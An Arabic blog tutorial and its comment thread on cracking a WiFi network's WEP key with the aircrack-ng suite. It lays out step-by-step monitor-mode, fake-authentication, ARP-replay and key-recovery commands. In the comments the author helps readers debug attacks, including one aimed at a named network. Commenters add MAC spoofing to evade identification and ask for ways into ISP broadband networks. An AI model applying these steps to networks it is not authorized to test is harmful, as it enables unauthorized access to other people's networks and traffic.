فيديو: WEP fake authentication attack
تقيمك :اليوم ان شاء الله سأشرح الـ fake authentication attack لاظهار الـ Key الخاص بشبكة وايرلس تستخدم تشفير WEP, طبعا اهم شيئ هو جمع اكبر كمية ممكنة من الحزم packets ويتم ذلك باستخدام عدة برامج من اشهرها aircrack-ng. ولكن ليستطيع البرنامج ان يجمع الحزم يجب ان يكون هناك جهاز اخر غيرك متصل بالشبكة و يستعمل الانترنت وفي كثير من الحالات نجد شبكة و لكن لا يوجد اي شخص متصل بها (كلاينت) و في هده الحالة هناك عدة اساليب بامكاننا استخدامها و اليوم ان شاء الله سأشرح اكثرها شهرة و هو الـ fake authentication attack.
الشرح باستخدام توزيعة BackTrack و يمكن تطبيقه على أي توزيعة لينكس أخرى…
خطوات العمل
1- وضع كرت الوايرلس في الـ moniter mode باستخدام الأمر:
airmon-ng start [interface]interface = اسم كرت الوايرلس الخاص بك
2- تشغيل aircrack-ng لجمع الحزم باستخدام الأمر:
airodump-ng –bssid [target network BSSID] -c [channel] -w [aoutput] [interface]
3- تشغيل aireplay لعمل fake auth attack باستخدام الأمر:
aireplay-ng -1 [reassocciation time] -e [target network ESSID] -a [target BSSID] -h [your MAC address] [interface]
4- تشغيل aireplay-ng لعمل arp request replay attack باستخدام الأمر:
aireplay-ng -3 -e [target ESSID] -b [Target BSSID] -h [our mac address] -x [number of paclets per second] [interface]
5- فك تشفير الحزم باستخدام aircrack-ng باستخدام الأمر:
aircrack-ng output.cab
و اي استفسار أنا حاظر
GHOST OF MATRIX , Zaid
زيد القريشي
التعليقات
عبدالمهيمن
19 مارس، 2009 الساعة 5:23 مشكرا أخي زيد على الشرح والفيديو الجميل.. من بعد اذنك قمت بتنسيق الموضوع وببعض التعديلات عليه.
وأتمنى من الجميع عدم استخدام الشرح في أمور غير شرعية أو خارج نطاق شبكتهم الخاصة…
kameran_killer
19 مارس، 2009 الساعة 1:49 ماخي العزيز نشكرك على موضيع القيمه اخي عندي كم سوال ان شالله تردون عليه ممكن تضعون طريقة اختراق نظام pppoe بروباند لشبكات لان هذا الحماية قوي ارجوا من منكم كخبراء تضعوا لنا حيل وابسرع وقت تحياتي
Hussain
20 مارس، 2009 الساعة 8:57 ميعطيك العافية يا زيد
كلو تمام الين وصلت لخطوة رقم 3
ايش تقصد با [reassocciation time]
ارجوا التوضيح
Zaid
20 مارس، 2009 الساعة 9:17 مkameran_killer:و الله يا اخي ما عندي خبرة بالنسبة للبرود باند
عبد المهيمن:مشكور على وضع الموضوع و طبعا لك الحرية في التعديل عليه
hussain:يستخدم الامر في الخطوة الثالثة من اجل البدء بارسال حزمة تقوم بعمل authentication لنا و الـreassocciation time نستبدلها بالزمن اللذ ينتظره البرنامج بين حزمة و الاخرى.بامكانك وضع اي زمن انا في الشرح خليت 600 ثانية.
Hussain
20 مارس، 2009 الساعة 9:42 مالله يعطيك العافية يالحبيب
الحين فهمت
في الشرح الفديو في اوامر مهي مكتوبة في الخطوات
زي الامر الي قبل لا نطلع الماك ادرس تبع كرت الويرلس
انت كتبت
airmon-ng -1 ??? -a
ايش الثلاث حروف الي كتبتها بدل الاستفهمات
Zaid
20 مارس، 2009 الساعة 9:53 مaireplay-ng -1 [reassocciation time] -e [target network ESSID] -a [target BSSID] -h [your MAC address] [interface]
بعد -1 يجي reassocciation time وانا حاطهة 600 بالفيديو
اما بالنسبة لمعرفة الماك ادرس اكتب بالكونسول
ifconfig [interface]
استبدل interface باسم كارد الوايرلس الخاص بك
Hussain
20 مارس، 2009 الساعة 10:14 متعبتك معي اخ Zaid
انا اقصد الامر الي قبل الخطوة ذي انت كتبت في التيرمنال
الامر
airmon-ng -1 ??? -a
شوف في الشرح الفديو بعد 1:6 دقيقة و ست ثواني تقريبا من زمن الفديو
سامحني شوي تعبتك
جزاك الله خير
Zaid
20 مارس، 2009 الساعة 10:48 متعبك راحة :d
الامر في 1:6 هوة نفس الامر في الخطوة 3
airmon-ng فقط يستخدم من اجل وضع كارد الوايرلس في monitor mode و هي دائما اول خطوة
Hussain
21 مارس، 2009 الساعة 12:40 مالله يعطيك العافية
ماقصرت
every thing is clear now
thanx a lot
القيصر أسد بابل
22 مارس، 2009 الساعة 7:27 صالسلام عليكم
اخي العزيز ان اختراق الشبكه المشفره بال WEP ليست بالامر الصعب حتى WPA ليست بالامر الصعب لكثرة مقاطع الفديو التي تشرح هذه العملية لكن الذي لم اجد له شرحا للان هو اختراق الشبكه التي تحتوي على اشتراكات بالمايكروتيك فارجوا مساعدتي بهذا الموضوع .
اخوكم القيصر
nadeem
15 أبريل، 2009 الساعة 2:28 صما شاء الله مشكورين على هذا العمل
بارك الله فيكم
Maryellen
18 يوليو، 2016 الساعة 9:37 صGood to find an expert who knows what he’s tanilkg about!
H4cK3r
16 أبريل، 2009 الساعة 11:10 ميعطيك العافية ياغالي على الشرح المميز
بس انا عندي شوي ملاحظات
الشرح سريع جداااااااا
واستخدام للغة الانجليزية بدل العربية
وشرحك رائع جدا واحيك عليه
دمت بود
mrloong
23 مايو، 2009 الساعة 11:16 صشـكــ وبارك الله فيك ـــرا لك … لك مني أجمل تحية .
JoNa
10 يونيو، 2009 الساعة 8:00 ميفضل تغيير الماك ادرس لجهازك قبل مهاجمة اي شبكة بالامر :
macchanger -m [fake mac] interface
Zaid
18 يونيو، 2009 الساعة 1:13 صمشكورين اخواني على المرور
jona:كلامك صحيح لكني لم اغير الماك ادرس الخاص بي لانني لم اريد ان اعقد الدرس.
Obaid
26 يونيو، 2009 الساعة 8:25 صالسلام عليكم ورحمة الله وبركاته
جزاك الله خير على الموضوع الشيق
ويعطيك العافية يا أخ Zaid
أنا استطعت فك شفرة WEP بوجود (كلاينت) والطريقة سهلة جدا.
وجربت تطبيق هذا الموضوع لفك الشفرة بدون وجود مستخدمين على الشبكة
لكن في الخطوة الثالثة بعد كتابة الأمر
aireplay-ng -1 [reassocciation time] -e [target network ESSID] -a [target BSSID] -h [your MAC address] [interface]
لم أقدر على المواصلة
وجائتني هذه الرسالة
Attak unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enable.
* check that the BSSID ( -a option ) is correct.
* Try to change the number of packets ( -o option).
* the driver/card doesn’t support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You’re too far frome the AP. Get closer, or lower the transmit rats.
علماً بأني استخدم وايرلس ألفا.
Obaid
26 يونيو، 2009 الساعة 8:27 صصورة للمشكلة
http://file13.9q9q.net/preview/61948819/123.JPG.html
مالحل ؟؟؟
faisal
4 يوليو، 2009 الساعة 7:53 مالسلام عليكم و رحمة الله و بركاته
شكرا جزيلا لك على الشرح
لكن عندي كم سؤال لا هنت
عندي شبكة كيف أعرف ان تشفيرها WEP
ثانيا هل أحتاج الي قطع خارجية او شيء لفك التشفير
ثالثا كيف اعرف إسم كرت الشبكة عندي جربة أستخدم أمر ifconig
resilt
eth0 Link encap:Ethernet HWaddr 00:1b:24:ca:36:23
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:250 Base address:0x8000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2380 errors:0 dropped:0 overruns:0 frame:0
TX packets:2380 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:130960 (130.9 KB) TX bytes:130960 (130.9 KB)
wlan0 Link encap:Ethernet HWaddr 00:1b:9e:50:71:0f
inet addr:192.168.1.65 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::21b:9eff:fe50:710f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:367682 errors:0 dropped:0 overruns:0 frame:0
TX packets:325091 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:461970870 (461.9 MB) TX bytes:44362825 (44.3 MB)
wmaster0 Link encap:UNSPEC HWaddr 00-1B-9E-50-71-0F-31-30-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
و شكرا جزيلا لك على التوضيح
Zaid
10 يوليو، 2009 الساعة 6:51 مObaid: اسف كثيرا على التأخر في الجواب لكنني لم الحظ وجود السؤال
واجهت هذه المشكلة اكثر من مرة و سببهة عدة اسباب مثل ما مذكور لك و لكن انت تأكد من تفعيل المونتر مود و تأكد من كتابة الاوامر بشكل صحيح
هناك احتمال ان كارد الوايرلس الخاص بك لا يدعم الـINJECTION في هذه الحالة يجب عليك شراء كارد اخر
لو تعطيني نوع كاردك بالضبط علشان اشوفلكبا اذا يدعم injection او لا
faisal:هناك عدة طرق لمعرفة تشفير الشبكة بامكانك معرفته باستخدام برنامج airodump-ng من خلال الامر
airodump-ng [interface]
و ستضهر لك جميع الشبكات المتوفرة و معلوماتها.ستجد نوع التشفير تحت حقل ENC
—————–
بالنسبة لكارد الوايرلس بامكانك معرفته من خلال كتابة الامر
airmon-ng
وسيظهر اسمه تحت حقل interface
في حالتك انه wlan0 ولكن نفذ الطريفة اعلاه للتأكد
و سامحوني على التأخر عليكم
Obaid
12 يوليو، 2009 الساعة 12:38 صمشكور أخي Zaid على الرد
بالنسبة للمونيتور مود فأنا متأكد من تفعيله, لكن أظن كما قلت أن الكرت المستخدم لا يدعم الإنجكشن.
أنا أستخدم كارد وايرلس (ألفا) وكما هو معلوم أنه أقوى لاقط موجود في السوق حيث أن حساسية إستقباله تصل إلى 96-dBm ، ولكن أظن أن عيبه في التشيبست (RealTek) .
-هل يوجد باتش لجعل الكارد يدعم الإنحيكشن؟
-هل يوجد كارد قوي بتشيبست (أثيروس) متوفر في السوق؟ لا أريد الشراء من النت.
وشكراً.
Zaid
12 يوليو، 2009 الساعة 1:14 صObaid:
هل هو داخلي ام خارجي ؟؟
و ما هو موديل الكارد بالضبط
لمعرفة موديله بالضبط نفذ الامر التالي اذا كان داخلي
lspci
اما اذا كان خارجي فنفذ التالي
lsusb
—————–
اما بالنسبة لشراء كارد خارجي فلا تشتري اي كارد الـchipset الخاصة به atheros لان chipset الusb غير مدعومة لحد الان
بامكانك استبدال الكارد الداخلي بكارد من نوع atheros (جربت بهذه الطريقة على جهاز قديم) و كانت النتيجة 100%
و بامكانك شراء كارد usb خارجي (وهوة ما استعمله حاليا ) انا شخصيا استخدم tplink-wn321g وهو فعال بشكل كبير كما تشاهد في الشرح D:
Mohannad Shahat
12 يوليو، 2009 الساعة 10:59 ميعطيك العافيه جربت الطريقه من موقعكم ومن هنا بتفاصيل اكثر http://lifehacker.com/5305094/…-backtrack
وتم كسر الباسورد بنجاح باستخدام Back|Track 4 و Aircrack-ng وكرت والويرلس Linksys WUSB45GC بعد التعديل والتحديث للكرت
شكرا لكم..
تحياتي
Zaid
12 يوليو، 2009 الساعة 11:28 مجميل
شوف هذه اللستة فيها كروت الوايرلس المتوافقة
http://backtrack.offensive-security.com/index.php/HCL:Wireless#ALFA_Networks_AWUS036H
و اعتمادا عليها فان كارد الالفا الخاص بك يدعم الانجكشن
جرب تفعله من توزيعة BACKTRACK3 من الـlive CD او بعد تنصيبها (لا تستعمله من الـvmware)
نفذ التالي:(فرضا ان اسم كارد الوايرلس الخاص بك هو wlan0):
ifconfig wlan0 down
iwconfig wlan0 txpower 20
iwconfig wlan0 mode monitor
ifconfig wlan0 up
جرب و اذا اشتغل جرب الطريقة من الـvmware
Obaid
13 يوليو، 2009 الساعة 12:40 صجزاك الله خير لقد أفرحتني، سأطبق ما قلت لي حالما انتهي من اصلاح الكمبيوتر.
– وجدت الباتش في الصفحة، سأضيفه إن فشلت في الحقن.
كما هو مكتوب:
This section lists Cards that have been tested with BackTrack. If you have tested a card that does not appear on this list, please add it in!
وهذا الباتش للتشيبست realtek
rtl8187 (Patched for Injection
Obaid
12 يوليو، 2009 الساعة 2:57 ميا أخ Zaid حاليا لا أستطيع تطبيق الأوامر لمعرفة نوع الكارد لأن جهازي فيه بعض المشاكل والهارديسك ممتليء، فلا أستطيع تثبيت البرنامج الوهمي للينكس.
هل تكفيك هذه المعلومات عن الكارد؟
Alfa High Power WLAN USB Adpter AWUS036H
وهذا رابط المنتج على موقع الشركة
http://dplanet.biz/alfa.com/product_info.php?products_id=342
-الكارد TpLink-wn321g و TpLink-WN422G أتذكر أني استخدمتهما قبل فترة وقد استعرتها من صديقي، عيبها أنها ضعيفة في التقاط الشبكات.
عموما سأجربها مرة أخرى إن شاء الله.
x2@live.de
17 يوليو، 2009 الساعة 3:05 معندي استفسار بسيط الله يبارك فيك
طبعا انا استخدم نظام لينكس ابونتو 9.4 ومنزل هذا النظام على الوندوز بواسطة برنامج
VMware
وعندي جهاز يو اس بي الفا وايرلس
ALFA-AWUS036H
وهذا الجهاز يدعم الانجكشن
لكن بيني وبينك متلخبط من ناحيه برنامج الايركراك
مادري كيف طريقة تنزيله مع الادوات المطلوبه
لي اكثر من شهر وانا اعمل بحث وانزل شروحات من كل مكان لدرجة اني تعلمت مبادئ اللينكس
وياريت شرح من اياديك الله يوفقك ويسهل امورك
في انتظار توجيهاتك يابطل
mohammed ibahem
17 يوليو، 2009 الساعة 3:14 ميعجز اللسان عن الشكر
عندي استفسار بسيط الله يبارك فيك
طبعا انا استخدم نظام لينكس ابونتو 9.4 ومنزل هذا النظام على الوندوز بواسطة برنامج
VMware
وعندي جهاز يو اس بي الفا وايرلس
ALFA-AWUS036H
وهذا الجهاز يدعم الانجكشن
لكن بيني وبينك متلخبط من ناحيه برنامج الايركراك
مادري كيف طريقة تنزيله مع الادوات المطلوبه
ياريت شرح الخطوات وشكرا لك
في انتظار توجيهاتك يابطل
اخوك محمد
Zaid
17 يوليو، 2009 الساعة 4:11 مmohammed ibahem:
اهلا فيك اخي
بالنسبة للاوبنتو لتركيب البرنامج نفذ الامر التالي
sudo apt-get install aircrack-ng
تحياني
Zaid
mohammed ibahem
18 يوليو، 2009 الساعة 4:27 ممرحبا اخي zaid
فعلت كما قلت وظهرت لي هذه الرساله
m7mdof@m7mdof-desktop:~$ su root
Password:
su: Authentication failure
m7mdof@m7mdof-desktop:~$
انا استخدمت كلمة السر لـm7mdof لاني لا اعلم ماهي كلمة المستخدم root
اتعبتك معي اخي zaid اتمنى ان تتحملني وبارك الله فيك
mohammed ibahem
18 يوليو، 2009 الساعة 4:56 متم ولله الحمد بهذا الامر sudo -i
m7mdof@m7mdof-desktop:~$ sudo -i
[sudo] password for m7mdof:
root@m7mdof-desktop:~#
mohammed ibahem
18 يوليو، 2009 الساعة 5:18 ميبقى السؤال كيف اضعه على monitor mode
لاني جربت هذا الامر
root@m7mdof-desktop:~# sudo ifconfig wlan0 down
wlan0: ERROR while getting interface flags: No such device
root@m7mdof-desktop:~# sudo iwconfig wlan0 mode monitor
Error for wireless request “Set Mode” (8B06) :
SET failed on device wlan0 ; No such device.
root@m7mdof-desktop:~# iwpriv ath0
ath0 no private ioctls.
root@m7mdof-desktop:~#
هل يجب عند وضع الامر ان اغلق الاتصال العادي او ماهي المشكله وشكرا لك اخي zaid
mohammed ibahem
18 يوليو، 2009 الساعة 5:21 موعند بحث الشبكات
root@m7mdof-desktop:~# iwlist ath0 scan
ath0 Interface doesn’t support scanning.
root@m7mdof-desktop:~#
اتمنى توجيهاتك اخي zaid وشكرا لك
mohammed ibahem
18 يوليو، 2009 الساعة 5:25 موعند تنفيذ airmon-ng
root@m7mdof-desktop:~# airmon-ng
InterfaceChipsetDriver
wlan1RTL8187 rtl8187 – [phy0]
mohammed ibahem
18 يوليو، 2009 الساعة 5:44 مroot@m7mdof-desktop:~# airmon-ng
InterfaceChipsetDriver
wlan1RTL8187 rtl8187 – [phy0]
root@m7mdof-desktop:~# airmon-ng start wlan1
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PIDName
2714NetworkManager
2721wpa_supplicant
2738avahi-daemon
2739avahi-daemon
InterfaceChipsetDriver
wlan1RTL8187 rtl8187 – [phy0]
(monitor mode enabled on mon0)
root@m7mdof-desktop:~#
شغلنا تمام او فيه مشكله اخي zaid ??
ماهي الخطوات التاليه وشكرا لك
mohammed ibahem
18 يوليو، 2009 الساعة 8:56 صالسلام عليكم
عند تنفيذ الامر
m7mdof@m7mdof-desktop:~$ sudo apt-get install aircrack-ng
[sudo] password for m7mdof:
Reading package lists… Done
Building dependency tree
Reading state information… Done
aircrack-ng is already the newest version.
The following packages were automatically installed and are no longer required:
linux-headers-2.6.28-11 linux-headers-2.6.28-11-generic tcl8.5
Use ‘apt-get autoremove’ to remove them.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
m7mdof@m7mdof-desktop:~$
=====
وعند تنفيذ امر airmon-ng
m7mdof@m7mdof-desktop:~$ airmon-ng
Run it as root
m7mdof@m7mdof-desktop:~$
ما العمل لاختيار شبكه وجمع الباكجات اخوي Zaid
شكرا لك
mohammed ibahem
18 يوليو، 2009 الساعة 9:20 صمع العلم اخي Zaid
عند تركيب البرنامج aircrack-ng من synaptic package manger
ظهر في قائمة البرامج هذا فقط
Passwords and Encryption Keys
اعتقد ان البرنامج ناقص لاني لا اجد بقية الادوات مثل airodump-ng – airmon-ng
Zaid
19 يوليو، 2009 الساعة 1:44 صmohammed ibahem:من ناتج برنامج airmon-ng
(monitor mode enabled on mon0)
يعني انه تم تفعيل المونتر مود على mon0
خلص الان كمل الشرح و استبدل interface ب mon0
Zaid
18 يوليو، 2009 الساعة 2:47 مانت البرنامج اصلا مركب عندك شوف شو طلعلك لمن نفذت الامر
aircrack-ng is already the newest version.
يعني ان البرنامج منصب و باخر نسخة
حتى تستخدم البرنامج لازم تكون صلاحياتك روت
قبل ما تنفذ اي امر نفذ
su root
سوف يطلب منك كلمة مرور الروت صعها و اضغط انتر
بعدها ستلاحظ ظهور علامة # بدل $ مما يعني ان صلاحياتك روت
الان بامكناك استخدام البرنامج
mohammed ibahem
19 يوليو، 2009 الساعة 3:37 معوده اخي zaid
انا متوقف عند الخطوه الثالثه
طلعت الماك تبعي وسجلت الماك تبع الشبكه اللي بهاجمهاوكل شي تمام ولكن عند تنفيذ الامر
تظهر لي رساله
“aireplay-ng –help” for help.
==
طبقت شرحك بحذافيره ولكن لا اعلم اين المشكله
وكرت الشبكه على المونتور مود
وايضا جربت بداية الامر بـ airmon-ng بدلا من aireplay-ng
ولكن دون فائده اتمنى التوضيح وجزاك الله خير اخوي zaid
Zaid
19 يوليو، 2009 الساعة 5:29 مبما ان البرنامج يعطي هذه الرسالة
aireplay-ng –help” for help
فهذا يعني ان هناك خطأ في كتابة الامر و ليس له اي علاقة بالمونتر مود
لو تعطني الامر اللذي نفذته و تسبب في هذه الرسالة حتى اكون قادر على معرفة مكان الخطأ
mohammed ibahem
19 يوليو، 2009 الساعة 9:38 مroot@m7mdof-desktop:~# aireplay-ng -1 600 -e King Of The Dark -a 00:90:D0:E6:37:4F -h 00-00-CA-26-61-69 mon0
“aireplay-ng –help” for help.
هذا الامر كله
Zaid
19 يوليو، 2009 الساعة 10:44 مكل شي تمام بس الغلط في خيار e- لان اسم الشبكة فيه فراغ فلازم تحطه بين علامتي تنصيص “” شوف كيف سيكون الامر:
aireplay-ng -1 600 -e “King Of The Dark” -a 00:90:D0:E6:37:4F -h 00-00-CA-26-61-69 mon0
mohammed ibahem
20 يوليو، 2009 الساعة 10:49 صاشكرك جزيل الشكر اخوي zaid على تجاوبك معي
شاهد النتيجه .. اعتقد نفس مشكلة الاخ عبيد
10:37:12 Sending Authentication Request (Open System)
10:37:15 Sending Authentication Request (Open System)
10:37:18 Sending Authentication Request (Open System)
10:37:21 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn’t support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You’re too far from the AP. Get closer, or lower
the transmit rate.
Zaid
20 يوليو، 2009 الساعة 11:10 مmohammed ibahem:
نعم نفس رسالة الخطأ اللتي واجهها الاخ عبد
هذه الرسالة سببها اكثر من سبب بس اكثر احتمال هو ان كارد الوايرلس غير قادر على عمل injection
قد تحتاج الى عمل patch للكارد الخاص بك
mohammed ibahem
21 يوليو، 2009 الساعة 3:03 مالسلام عليكم اخوي zaid
رايك يبيلنا باتش للكرت اللي عندي
بس انا مستغرب … لان الكرت يدعم الانجكشن من الالفا
وهذه اسمه
ALFA-AWUS036H (RTL8187)
او ان الموضوع مايضبط مع
VMware
ويضبط مع
dual boot
عموما ياغالي شوف هالموضوع واتمنى رايك
قواك الله
http://forum.aircrack-ng.org/index.php?topic=5755.0
Zaid
22 يوليو، 2009 الساعة 6:37 مهو كاردك بدعم الانجكشن و لكن قد تحتاج الى عمل patch للكيرنيل
الموضوع اللذي وضعته يشرح كيفية تركيب الـdriver الخاص به
طبق الموضوع و جرب
اما بالنسبة للvmware فبعض الاحيان تحدث بعض المشاكل في الانجكشن
بامكانك تجربة الشرح من الـlive CD و شوف اذا صار انجكشن او لا و اذا ما صار يعني سوف تحتاج على عمل patch للكيرنيل
Zaid
5 أغسطس، 2009 الساعة 10:20 مو عليكم السلام mohammed ibahem
ما هي التوزيعة اللتي قمت بتنصيبها؟؟
بعد التعريف بامكانك معرفة اسمه خلال تنفيذ الامر
iwconfig
و كارد الوايرلس سيكون اماه
IEEE 802.11
او
aireplay-ng
تحياتي
mohammed ibahem
6 أغسطس، 2009 الساعة 12:48 صحياك الله اخوي zaid
التوزيعه هي ابونتو 9.4
—
وعند عمل الامر
root@m7mdof:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wmaster0 no wireless extensions.
wlan0 IEEE 802.11abg ESSID:””
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=0 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
wmaster1 no wireless extensions.
wlan1 IEEE 802.11bg ESSID:””
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
pan0 no wireless extensions.
root@m7mdof:~#
—
ولكن لا اعلم هل هو تم تعريفه ام لا
mohammed ibahem
5 أغسطس، 2009 الساعة 12:57 مالسلام عليكم اخوي zaid
انا حاليا نزلت لينكس من جديد ولكن بطريقة dual boot
ولكن واجهتني مشكلة تعريف الالفا على اللينكس
مادري وشلون طريقة تعريفه
ياريت يخوي zaid نلقى حل لهذه المشكله ونقطه اخرى كيف اعرف اسم (الانترفيس) الخاص بالالفا بعد التعريف
وهذا هو موديله ALFA-AWUS036H
ولا انسى وقفاتك الجباره معي.
عبدالمهيمن
6 أغسطس، 2009 الساعة 1:41 صأخي ما رأيك أن تعتمد على نفسك قليلا؟ أنا متابع لأسئلتك و ردود الأخ زيد عليك من البداية وبصراحة حسدته على صبره وطول باله!
اذا لم تتعتب وتبحث بنفسك عن حلول وتجرّب.. كن متأكد أنك لن تستفيد بشيء وأقول لك هذا الكلام عن تجربة! حتى لو وجدت من يجاوب على كل أسئلتك واستفساراتك لا أنصحك أن تعتمد عليه الا بالمرحلة الأخيرة بعد بحث طويل وعندما تعجز عن حل مشكلتك 🙂
دمتم بود…
Zaid
6 أغسطس، 2009 الساعة 3:26 مmohammed ibahem: الكارد متعرف عندك ولا يحتاج الى تعريف
و مثل ما قال الاخ عبد المهمين اذا حاولت تحل بعض المشاكل بنفسك ستستفيد اكثر بكثير
تحياتي
mohammed ibahem
6 أغسطس، 2009 الساعة 2:59 صاخي عبدالمهيمن حياك الله اولا
الحاصل يا اخي الكريم انني قمت بأكثر من تجربه للانظمه الوهميه ولكن للاسف لم تفلح وحاليا سأقوم بتجربه عن طريق dual boot وان شاءالله ستفلح ولكن اعاقني التعريف لان الانظمه الوهميه السابقه كانت تتعرف على الشبكه تلقائي ولكن لاتدعم الانجكشن فاضطريت لعمل dual boot..اما بالنسبه لخطوات الشرح فجزاه الله خير الجزاء اخي zaid على ما قدمه لي من دعم ويعلم الله ان لساني يعجز عن شكره ولن اوفيه حقه مهما كان..
اخي الكريم يعلم الله اني بحثت وسألت وتعلمت اشياء بسيطه لنظام جديد علي ومازلت اجهل الكثير منه.. والتجارب المطروحه جزء بسيط ..واضف الى ذلك انني مبتدا في اللينكس .. بالاضافه انني قمت بفرمتة الجهاز وتنصيب جزء خاص لـ لينكس بالاضافه الى المشاكل التي واجهتني اثناء تنصيبه بجانب الوندوز واشياء كثيره لا اريد ان اطيل في الكلام عنها.. خلاصة الكلام جزاك الله خير اخي عبدالمهيمن على نصيحتك
Security-Mind
11 أغسطس، 2009 الساعة 1:48 مجميل جدا صديقي زيد .وربي انك مبدع انا شاهدت الفيديو عندما انزلتة في مستر عراق 😀
sultan
30 أغسطس، 2009 الساعة 4:55 صلمى احط الامر airmon-ng start eth1 مع اسم الواير لس حقي
تكون النتيجه :
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PIDName
2635NetworkManager
2641wpa_supplicant
2659avahi-daemon
2660avahi-daemon
7868dhclient
Process with PID 7868 (dhclient) is running on interface eth1
InterfaceChipsetDriver
eth1Unknown wl (monitor mode enabled)
كيف استطيع تخطي المشكله حتى استخدم الامر airodump-ng ﻻن ناتجهه يقول :
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run ‘airmon-ng start eth1 ‘
Sysfs injection support was not found either.
حاولت البحث عن حل ﻻكن لم استطع العثور على شئ ساكمل البحث وارجوا منك المساعده شكرا
Zaid
30 أغسطس، 2009 الساعة 7:16 متأكد من دعم كاردك للانجكشن و اذا كان يدعم الانجكشن فقد تحتاج الى عمل باتش للكيرنيل
a.j
2 سبتمبر، 2009 الساعة 4:03 مerror no such bssid available
Zaid
4 سبتمبر، 2009 الساعة 12:28 صهناك خطأ الmac address الخاص بالشبكة الهدف
Tariq Mohamed
26 أكتوبر، 2009 الساعة 9:36 صNetwork controller: Intel Corporation PRO/Wireless 2200BG [Calexico2] Network Connection (rev 05)
شكرا اخى على الشرح
اريد اعرف هل هذا النوع داعم للاختراق
ahmed
21 ديسمبر، 2009 الساعة 9:55 صالاخ الفاضل اولا اشكرك على المعلومات الرائعه ولكنني اريد معرفة بداية الامر مع العلم ان الجهاز الذي لدي هو لاب توب Hp واريد معرفة كيف اقوم بادخال الاوامر وما هي البرامج المستخدمة لادخال الاوامر ، كما ارجو بامدادي بالمواقع اللازمة لتحميل البرامج . وشكرا
ras517
16 مارس، 2010 الساعة 11:28 مaireplay-ng -3 -e [target ESSID] -b [Target BSSID] -h [our mac address] -x [number of paclets per second] [interface]
اخي الكريم ماذا تقصد بـ(number of paclets per second) ولك تحياتي
Zaid
17 مارس، 2010 الساعة 12:23 صعدد الحزم التي سيتم ارسالها في الثانية
ضعه نفس الرقم الموجود بالشرح
ras517
17 مارس، 2010 الساعة 7:59 صكم العدد لان الشرح الفيديو غير واضح
Zaid
18 مارس، 2010 الساعة 12:47 صالعدد هو 500
ملك الاسرار
29 يونيو، 2010 الساعة 8:29 صالسلام عليكم ياخوان ممكن تقولون لي ايش البرنامج هذا البرنامج ماعرف لو ماعرف فين اكتب الاوامر هذه بالله ممكن تعطوني اسم البرنامج وشكراااااا
Feras Mohandes
27 فبراير، 2011 الساعة 6:13 صتظهر لي هذه المشكلة عند تنفيذ حزمة aireplay-ng الخطا
mon0 is on channel -1, but the AP uses channel 11
essa
28 مايو، 2011 الساعة 1:51 صانا عندي شبكه wep لاكن البيسيد لدى الشبكه متكرر ويظهر عدد كمبير من البيسيد للشبكه ولي شبكه واحده انا برفع الفيديو على اليوتيوب واتمنا مساعددتك
essa
28 مايو، 2011 الساعة 1:54 صهاذا رابط الموع http://forums.soqor.net/showthread.php?t=6057 اتمنا تساعدني في تنصيب البرامج المقاله في الموقع
فراس
5 يوليو، 2014 الساعة 5:21 مأخ زيد عندي مشكلة
wl – [phy0]mon0: ERROR while getting interface flags: No such device
وانا بستخدم نظام ubuntu 04.14
وشكرا
TNT_ON
11 سبتمبر، 2014 الساعة 12:27 صالفيديو غير واضح
لا حول ولا قوة الا بالله ~